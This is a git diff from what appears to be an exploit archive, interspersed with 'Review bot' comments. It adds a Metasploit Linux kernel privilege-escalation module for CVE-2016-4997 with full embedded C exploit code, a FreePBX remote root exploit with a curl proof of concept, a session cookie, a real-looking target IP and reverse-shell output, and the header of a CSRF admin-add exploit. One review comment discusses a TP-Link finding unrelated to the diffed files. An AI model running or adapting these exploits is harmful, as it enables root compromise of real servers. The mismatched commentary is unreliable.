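Review bot: The header still carries template residue (`# Version: 1.0.6 (REQUIRED)`) and the write-up never names the root cause; a sentence such as `The administrator console apparently renders the DHCP host-name of connected clients without output encoding` would say what has to be fixed instead of leaving it to be inferred from the steps. The observation near the end, a cookie holding the base64-encoded username and password and no CSRF token, is a separate finding and deserves its own heading. The closing note says TP-Link reproduced the problem but names no fixed firmware; the text should state that no fixed version was known at the time of writing, so readers do not assume 1.0.6 is the only affected release.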
@@ -0,0 +1,431 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', + 'Description' => %q{ + This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently + only works against Ubuntu 16.04 (not 16.04.1) with kernel + 4.4.0-21-generic. + Several conditions have to be met for successful exploitation: + Ubuntu: + 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) + 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile + Kernel 4.4.0-31-generic and newer are not vulnerable. + + We write the ascii files and compile on target instead of locally since metasm bombs for not + having cdefs.h (even if locally installed) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die ', # Module + 'vnik' # Discovery + ], + 'DisclosureDate' => 'Jun 03 2016', + 'Platform' => [ 'linux'], + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Ubuntu', { } ] + #[ 'Fedora', { } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'EDB', '40049'], + [ 'CVE', '2016-4997'], + [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), + OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running 
pwn',false]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) + ], self.class) + end + + def check + def iptables_loaded?() + # user@ubuntu:~$ cat /proc/modules | grep ip_tables + # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 + # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 + vprint_status('Checking if ip_tables is loaded in kernel') + if target.name == "Ubuntu" + iptables = cmd_exec('cat /proc/modules | grep ip_tables') + if iptables.include?('ip_tables') + vprint_good('ip_tables.ko is loaded') + else + print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command') + end + return iptables.include?('ip_tables') + elsif target.name == "Fedora" + iptables = cmd_exec('cat /proc/modules | grep iptable_raw') + if iptables.include?('iptable_raw') + vprint_good('iptable_raw is loaded') + else + print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') + end + return iptables.include?('iptable_raw') + else + return false + end + end + + def shemsham_installed?() + # we want this to be false. + vprint_status('Checking if shem or sham are installed') + shemsham = cmd_exec('cat /proc/cpuinfo') + if shemsham.include?('shem') + print_error('shem installed, system not vulnerable.') + elsif shemsham.include?('sham') + print_error('sham installed, system not vulnerable.') + else + vprint_good('shem and sham not present.') + end + return (shemsham.include?('shem') or shemsham.include?('sham')) + end + + if iptables_loaded?() and not shemsham_installed?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. 
+ def has_prereqs?() + vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') + if target.name == "Ubuntu" + lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') + if lib.include?('install') + vprint_good('libc6-dev-i386 is installed') + else + print_error('libc6-dev-i386 is not installed. Compiling will fail.') + end + multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') + if multilib.include?('install') + vprint_good('gcc-multilib is installed') + else + print_error('gcc-multilib is not installed. Compiling will fail.') + end + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') + elsif target.name == "Fedora" + lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'') + if lib.include?('glibc') + vprint_good('glibc-devel.i686 is installed') + else + print_error('glibc-devel.i686 is not installed. Compiling will fail.') + end + if lib.include?('libgcc') + vprint_good('libgcc.i686 is installed') + else + print_error('libgcc.i686 is not installed. Compiling will fail.') + end + multilib = false #not implemented + gcc = false #not implemented + return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib + else + return false + end + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!') + end + + desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + payload_file = rand_text_alpha(8) + payload_path = "#{datastore["WritableDir"]}/#{payload_file}" + + # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here + # removed #include per busterb comment in PR 7326 + decr = %q{ + #define _GNU_SOURCE + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define MALLOC_SIZE 66*1024 + + int decr(void *p) { + int sock, optlen; + int ret; + void *data; + struct ipt_replace *repl; + struct ipt_entry *entry; + struct xt_entry_match *ematch; + struct xt_standard_target *target; + unsigned i; + + sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); + + if (sock == -1) { + perror("socket"); + return -1; + } + + data = malloc(MALLOC_SIZE); + + if (data == NULL) { + perror("malloc"); + return -1; + } + + memset(data, 0, MALLOC_SIZE); + + repl = (struct ipt_replace *) data; + repl->num_entries = 1; + repl->num_counters = 1; + repl->size = sizeof(*repl) + sizeof(*target) + 0xffff; + repl->valid_hooks = 0; + + entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); + entry->target_offset = 74; // overwrite target_offset + entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); + + ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); + + strcpy(ematch->u.user.name, "icmp"); + void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); + uint64_t *me = (uint64_t *)(kmatch + 0x58); + *me = 0xffffffff821de10d; // magic number! 
+ + uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); + *match = (uint32_t)kmatch; + + ematch->u.match_size = (short)0xffff; + + target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); + uint32_t *t = (uint32_t *)target; + *t = (uint32_t)kmatch; + + printf("[!] Decrementing the refcount. This may take a while...\n"); + printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n"); + + for (i = 0; i < 0xffffff/2+1; i++) { + ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); + } + + close(sock); + free(data); + printf("[+] Done! Now run ./pwn\n"); + + return 0; + } + + int main(void) { + void *stack; + int ret; + + printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n"); + + ret = unshare(CLONE_NEWUSER); + + if (ret == -1) { + perror("unshare"); + return -1; + } + + stack = (void *) malloc(65536); + + if (stack == NULL) { + perror("malloc"); + return -1; + } + + clone(decr, stack + 65536, CLONE_NEWNET, NULL); + + sleep(1); + + return 0; + } + } + + # direct copy of code from exploit-db + pwn = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + + #define MMAP_ADDR 0xff814e3000 + #define MMAP_OFFSET 0xb0 + + typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); + typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); + + void __attribute__((regparm(3))) privesc() { + commit_creds_fn commit_creds = (void *)0xffffffff810a21c0; + prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; + commit_creds(prepare_kernel_cred((uint64_t)NULL)); + } + + int main() { + void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); + assert(payload == (void *)MMAP_ADDR); + + void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); + + memset(shellcode, 0, 0x300000); + + void *ret = memcpy(shellcode, &privesc, 0x300); + assert(ret == 
shellcode); + + printf("[+] Escalating privs...\n"); + + int fd = open("/dev/ptmx", O_RDWR); + close(fd); + + assert(!getuid()); + + printf("[+] We've got root!"); + + return execl("/bin/bash", "-sh", NULL); + } + } + + # the original code printed a line. However, this is hard to detect due to threading. + # so instead we can write a file in /tmp to catch. + decr.gsub!(/printf\("\[\+\] Done\! Now run \.\/pwn\\n"\);/, + "int fd2 = open(\"#{env_ready_file}\", O_RDWR|O_CREAT, 0777);close(fd2);" ) + + # patch in to run our payload + pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/, + "execl(\"#{payload_path}\", NULL);") + + def pwn(payload_path, pwn_file, pwn, compile) + # lets write our payload since everythings set for priv esc + vprint_status("Writing payload to #{payload_path}") + write_file(payload_path, generate_payload_exe) + cmd_exec("chmod 555 #{payload_path}") + register_file_for_cleanup(payload_path) + + # now lets drop part 2, and finish up. + rm_f pwn_file + if compile + print_status "Writing pwn executable to #{pwn_file}.c" + rm_f "#{pwn_file}.c" + write_file("#{pwn_file}.c", pwn) + cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") + register_file_for_cleanup("#{pwn_file}.c") + else + print_status "Writing pwn executable to #{pwn_file}" + write_file(pwn_file, pwn) + end + register_file_for_cleanup(pwn_file) + cmd_exec("chmod +x #{pwn_file}; #{pwn_file}") + end + + if not compile # we need to override with our pre-created binary + # pwn file + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') + fd = ::File.open( path, "rb") + pwn = fd.read(fd.stat.size) + fd.close + # desc file + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') + fd = ::File.open( path, "rb") + decr = fd.read(fd.stat.size) + fd.close + + # overwrite the hardcoded variable names in the compiled versions + env_ready_file = '/tmp/okDjTFSS' + payload_path = '/tmp/2016_4997_payload' + end + + # 
check for shortcut + if datastore['REEXPLOIT'] + pwn(payload_path, pwn_file, pwn, compile) + else + rm_f desc_file + if compile + print_status "Writing desc executable to #{desc_file}.c" + rm_f "#{desc_file}.c" + write_file("#{desc_file}.c", decr) + register_file_for_cleanup("#{desc_file}.c") + output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") + else + write_file(desc_file, decr) + end + rm_f env_ready_file + register_file_for_cleanup(env_ready_file) + #register_file_for_cleanup(desc_file) + if not file_exist?(desc_file) + vprint_error("gcc failure output: #{output}") + fail_with(Failure::Unknown, "#{desc_file}.c failed to compile") + end + if target.name == "Ubuntu" + vprint_status "Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created." + elsif target.name == "Fedora" + vprint_status "Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created." + end + cmd_exec("chmod +x #{desc_file}; #{desc_file}") + sec_waited = 0 + + until sec_waited > datastore['MAXWAIT'] do + Rex.sleep(1) + if sec_waited % 10 == 0 + vprint_status("Waited #{sec_waited}s so far") + end + + if file_exist?(env_ready_file) + print_good("desc finished, env ready.") + pwn(payload_path, pwn_file, pwn, compile) + return + end + sec_waited +=1 + end + end + end +end \ No newline at end of file diff --git a/platforms/linux/local/21980.c b/platforms/linux/local/21980.c index 16096aead..9211e56b7 100755 --- a/platforms/linux/local/21980.c +++ b/platforms/linux/local/21980.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/6094/info Vulnerabilities have been discovered in two files used by Abuse. 
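Review bot: The `Description` lists what exploitation needs but nothing a defender can act on, even though the embedded C shows the dependency: `main` returns early unless `unshare(CLONE_NEWUSER)` succeeds, and the text already says kernels from 4.4.0-31-generic on are not vulnerable. I would close the description with a sentence along the lines of `Hosts that do not allow unprivileged user namespaces are not exposed to this path; the fix is the kernel commit listed under References.` The non-compile branch also replaces `env_ready_file` and `payload_path` with the fixed names `/tmp/okDjTFSS` and `/tmp/2016_4997_payload`, ignoring `WritableDir`, and `#register_file_for_cleanup(desc_file)` is commented out, so an assessment leaves files at predictable paths on the host. The module documentation should list those paths so the system owner can verify their removal afterwards.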
@@ -7,6 +8,7 @@ By passing an execessively long commandline argument to Abuse, it is possible to It should be noted that one of the affected files is installed setuid root. It should also be noted that Abuse 2.00, packaged and distributed with the x86 architecture of Debian Linux 3.0 has been reported vulnerable. It is not yet known if other packages are affected by this issue. +*/ /* Abuse.console version 2.0 Exploit */ /* By Girish diff --git a/platforms/linux/local/40203.py b/platforms/linux/local/40203.py index 811a5c80f..1521ca292 100755 --- a/platforms/linux/local/40203.py +++ b/platforms/linux/local/40203.py @@ -4,13 +4,11 @@ # Program affected: zFTP Client # Affected value: NAME under FTP connection # Where in the code: Line 30 in strcpy_chk.c -# __strcpy_chk (dest=0xb7f811c0 "/KUIP", src=0xb76a6680 -"/MACRO", destlen=0x50) at strcpy_chk.c:30 +# __strcpy_chk (dest=0xb7f811c0 "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30 # Version: 20061220+dfsg3-4.1 # # Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org -# Program description: ZFTP is a macro-extensible file transfer -program which supports the +# Program description: ZFTP is a macro-extensible file transfer program which supports the # transfer of formatted, unformatted and ZEBRA RZ files # Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb # MD5sum: 524217187d28e4444d6c437ddd37e4de diff --git a/platforms/multiple/dos/38779.py b/platforms/multiple/dos/38779.py index c88edbd21..1a7598599 100755 --- a/platforms/multiple/dos/38779.py +++ b/platforms/multiple/dos/38779.py @@ -1,3 +1,4 @@ +''' source: http://www.securityfocus.com/bid/62723/info Abuse HTTP Server is prone to a remote denial-of-service vulnerability. 
@@ -5,6 +6,7 @@ Abuse HTTP Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. +''' #!/usr/bin/python diff --git a/platforms/php/remote/40434.rb b/platforms/php/remote/40434.rb new file mode 100755 index 000000000..d1090884c --- /dev/null +++ b/platforms/php/remote/40434.rb 
@@ -0,0 +1,240 @@ +#Title : Freepbx < 13.0.188 , Remote root exploit +#Vulnerable software : Freepbx < 13.0.188 +#Author : Ahmed Sultan (0x4148) +#Email : 0x4148@gmail.com +#Current software status : patch released +#Vendor : Sangoma + +=begin +Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking +Technical details +Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php +Line 102 : + public function generateCallFile($foo) { + ............................... + if (empty($foo['filename'])) { + $foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable + } + ........................... + // Delete any old .call file with the same name as the one we are creating. + if(file_exists($outfile) ) { + unlink($outfile); + } + // Create up a .call file, write and close + $wuc = fopen($tempfile, 'w'); + fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" ); + fputs( $wuc, "maxretries: ".$foo['maxretries']."\n"); + fputs( $wuc, "retrytime: ".$foo['retrytime']."\n"); + fputs( $wuc, "waittime: ".$foo['waittime']."\n"); + fputs( $wuc, "callerid: ".$foo['callerid']."\n"); + fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable + fputs( $wuc, "application: ".$foo['application']."\n"); + fputs( $wuc, "data: ".$foo['data']."\n"); + fclose( $wuc ); + .......................... 
+The ext value can be manipulated by the attacker to change the output file path +the language value can be manipulated by the attacket to load in malicious contents +Function is called at +Line 94 : + public function addWakeup($destination, $time, $lang) { + $date = $this->getConfig(); // module config provided by user + $this->generateCallFile(array( + "time" => $time, + "date" => 'unused', + "ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field] + "language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code] + "maxretries" => $date['maxretries'], + "retrytime" => $date['retrytime'], + "waittime" => $date['waittime'], + "callerid" => $date['cnam']." <".$date['cid'].">", + "application" => 'AGI', + "data" => 'wakeconfirm.php', + )); + } +addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command +Line 60 : + switch($_REQUEST['command']) { + case "savecall": + if(empty($_POST['language'])) { + $lang = 'en'; //default to English if empty + } else { + $lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<=========================== + } + ............................................ + if ($badtime) { + // abandon .call file creation and pop up a js alert to the user + return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup))); + } else { + $this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<======================= + return array("status" => true); + } + ................................. 
+POC : +[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=" +{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}# + +The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call +the server will ignore.call extn and will execute the php + +[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call" +channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm +maxretries: 3 +retrytime: 60 +waittime: 60 +callerid: Wake Up Calls <*68> +set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +uid=499(asterisk) gid=498(asterisk) groups=498(asterisk) +application: AGI +data: wakeconfirm.php + +Privelage can be escalated via adding the asterisk user to sudoers which can be done manually +then echo a > /var/spool/asterisk/sysadmin/amportal_restart +sleeping for few seconds +then sudo bash -i + +MSF OUTPUT +msf > use exploit/fpbx +msf exploit(fpbx) > set RHOST 68.170.92.50 +RHOST => 68.170.92.50 +msf exploit(fpbx) > set RPORT 8080 +RPORT => 8080 +msf exploit(fpbx) > exploit + +[*] [2016.09.27-16:39:21] Started reverse 
TCP handler on 88.150.231.125:443 +[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . . +[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload +[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed +[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell + +id +uid=0(root) gid=0(root) groups=0(root) +sh -i +sh: no job control in this shell +sh-4.1# pwd +pwd +/var/www/html +sh-4.1# whoami +whoami +root +sh-4.1# +=end +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FreePBX < 13.0.188.1 Remote root exploit', + 'Description' => ' + This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup + ', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module + ], + 'References' => + [ + "NA" + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl telnet python' + } + }, + 'Platform' => %w(linux unix), + 'Arch' => ARCH_CMD, + 'Targets' => [['Automatic', {}]], + 'Privileged' => 'false', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 27 2016')) + end + + def print_status(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + def print_error(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + def print_good(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + # Application Check + def check + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'), + 'headers' => { + 'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff" + }, + 'vars_post' => { + 'module' => 'hotelwakeup', + 'command' => 'savecall' + } + ) + + unless res + 
vprint_error('Connection timed out.') + end + if res.body.include? "Referrer" + vprint_good("Hotelwakeup module detected") + return Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + def exploit + vprint_status('Sending payload . . .') + pwn = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'), + 'headers' => { + 'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + 'User-agent' => "mostahter ;)" + }, + 'vars_post' => { + 'module' => 'hotelwakeup', + 'command' => 'savecall', + 'day' => 'now', + 'time' => '+1 week', + 'destination' => '/../../../../../../var/www/html/0x4148.php', + 'language' => '', + } + ) + #vprint_status("#{pwn}") + vprint_status('Trying to execute payload ') + escalate = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '0x4148.php.call'), + 'vars_get' => { + '0x4148' => "r1z" + } + ) + if escalate.body.include? "0x4148@r1z" + vprint_good("Payload executed") + vprint_status("Spawning root shell") + killit = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '0x4148.php.call'), + 'vars_get' => { + 'r1zcmd' => "#{payload.encoded}" + } + ) + else + vprint_error("Exploitation Failed") + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40168.txt b/platforms/php/webapps/40168.txt new file mode 100755 index 000000000..c93975b3f --- /dev/null +++ b/platforms/php/webapps/40168.txt 
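Review bot: The `=begin … =end` header reproduces a PoC transcript against what looks like a routable third-party address, including a `PHPSESSID` cookie, and the "MSF OUTPUT" block repeats that address; both should be replaced with a documentation address such as `192.0.2.10` (constructed) and a dummy cookie before the file is published. `'References' => [ "NA" ]` leaves readers without a pointer to the fix, although the header itself says a patch was released for versions below 13.0.188; an entry like `[ 'URL', '<vendor advisory URL, not given on the page>' ]` would serve them better. The description would also benefit from stating the indicators the write-up already shows: POST requests to `admin/ajax.php` with `module=hotelwakeup`, `command=savecall` and a `destination` containing `../`, and `*.call` files appearing under the web root instead of the Asterisk spool directory.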
@@ -0,0 +1,65 @@ +================================================================================================================ +Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission +================================================================================================================ +# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit +# Exploit Author : Vinesh Redkar (@b0rn2pwn) +# Email : vineshredkar89[at]gmail[d0t]com +# Date: 21/07/2016 +# Vendor Homepage: http://openupload.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/openupload/ +# Version: 0.4.2 +# Tested on: Windows 10 OS + +Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning +that if an admin user can be tricked to visit a crafted URL created by +attacker (via spear phishing/social engineering). + +Once exploited, the attacker can login as the admin using the username and the password he posted in the form. + +======================CSRF POC (Adding New user with Admin Privileges)================================== +CSRF PoC Code + + +Remote Admin Add CSRF Exploit + +

Remote Admin Add CSRF Exploit by b0rn2pwn

+ +
+ + + + + + + + + + + +
+ + + +======================CSRF POC (Changing privileges from normal user to administer)================================== + + + +Change privilege normal user to administer CSRF Exploit + +

Change privilege normal user to administer CSRF Exploit by b0rn2pwn

+ +
+ + + + + + + + + + + +
+ +